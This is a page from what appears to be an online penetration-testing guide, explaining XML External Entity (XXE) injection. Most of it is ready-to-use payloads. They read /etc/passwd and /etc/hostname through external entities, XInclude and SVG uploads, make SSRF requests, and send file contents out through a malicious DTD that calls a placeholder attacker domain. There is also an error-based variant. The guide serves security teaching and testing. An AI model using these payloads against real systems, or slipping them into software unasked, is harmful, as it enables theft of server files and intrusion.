The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Proof of Concept
  • Blind XXE (Data out-of-band)
  • Blind XXE (Error message)
  • References
  1. WEB

XXE

Introduction

The XML External Entity (XXE) Processing attack is a type of attack that allows an attacker to interfere with an application's processing of XML data. This XML data contains a reference to an external entity (A system file or external URL) that is processed by the XML parser, leading to information disclosure, server-side request forgery and port scanning.

Proof of Concept

The following examples retrieve the file /etc/passwd from the victim system and show its content inside the "name" attribute.

<!-- EXAMPLE 1 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY output SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&output;</name>
</comment>

<!-- EXAMPLE 2 -->
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name><foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo></name>
</comment>

Furthermore, it can also be used to perform SSRF attacks:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY output SYSTEM "https://localhost/" >]>
<comment>
  <name>&output;</name>
</comment>

Finally, if the application allows SVG images to be uploaded. So, since the SVG format uses XML, the image processing library might analyze the image, obtaining a new attack surface.

Once the image is shown to the client, it will contain the retrieved information.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Blind XXE (Data out-of-band)

In a blind XXE attack, the attacker can not see the result of their injection and must rely on indirect methods to gather information or execute their payload.

To perform this attack, first, the attacker must host a malicious Document Type Definition (DTD) on their attacking machine and then invoke the malicious DTD from the DTD that is sent to the victim's website.

This is an example of retrieving the file /etc/password from the victim's website.

<!-- HOSTED MALICIOUS DTD (malicious.dtd) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<ATTACKER_DOMAIN>/?x=%file;'>">
%eval;
%exfiltrate;

<!-- SUBMITTED DTD -->
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://<ATTACKER_DOMAIN>/malicious.dtd"> %xxe;]>

Blind XXE (Error message)

Another alternative to retrieve data using an XXE vulnerability is by triggering an XML parsing error, only will work if the application shows the resulting error message within the response, where the error message will contain the sensitive data that you want to retrieve.

The payload would be:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

References

Last updated 2 years ago

A Deep Dive into XXE Injection
XML External Entity (XXE) Processing (OWASP)
XML external entity (XXE) injection